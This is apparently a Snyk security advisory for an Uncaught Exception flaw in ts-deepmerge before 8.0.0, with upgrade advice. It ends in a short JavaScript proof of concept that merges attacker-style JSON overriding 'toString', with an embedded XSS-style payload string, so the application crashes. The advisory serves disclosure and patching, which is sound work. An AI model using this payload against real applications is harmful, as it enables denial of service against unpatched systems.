Uncaught Exception Affecting ts-deepmerge package, versions <8.0.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-TSDEEPMERGE-17339141
- published18 Jun 2026
- disclosed21 May 2026
- creditIgor Garofano
Introduced: 21 May 2026
NewCVE-2026-12644 (opens in a new tab)How to fix?
Upgrade ts-deepmerge to version 8.0.0 or higher.
Overview
ts-deepmerge is an a deep merge function that automatically infers the return type based on your input, without mutating the source objects.
Affected versions of this package are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods (such as toString, valueOf). When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken — any string context operation throws a TypeError, crashing the application.
PoC
const { merge } = require('ts-deepmerge');
// Attacker-controlled input (e.g. from JSON.parse of user input)
const userInput = JSON.parse('{"toString": "<img src=x onerror=alert(1)>"}');
const config = { title: 'Hello', theme: 'dark' };
const result = merge(config, userInput);
console.log(typeof result.toString); // 'string' — no longer a function
// All of the following crash the application:
`${result}` // TypeError: Cannot convert object to primitive value
'' + result // TypeError: Cannot convert object to primitive value
[result].join() // TypeError: Cannot convert object to primitive value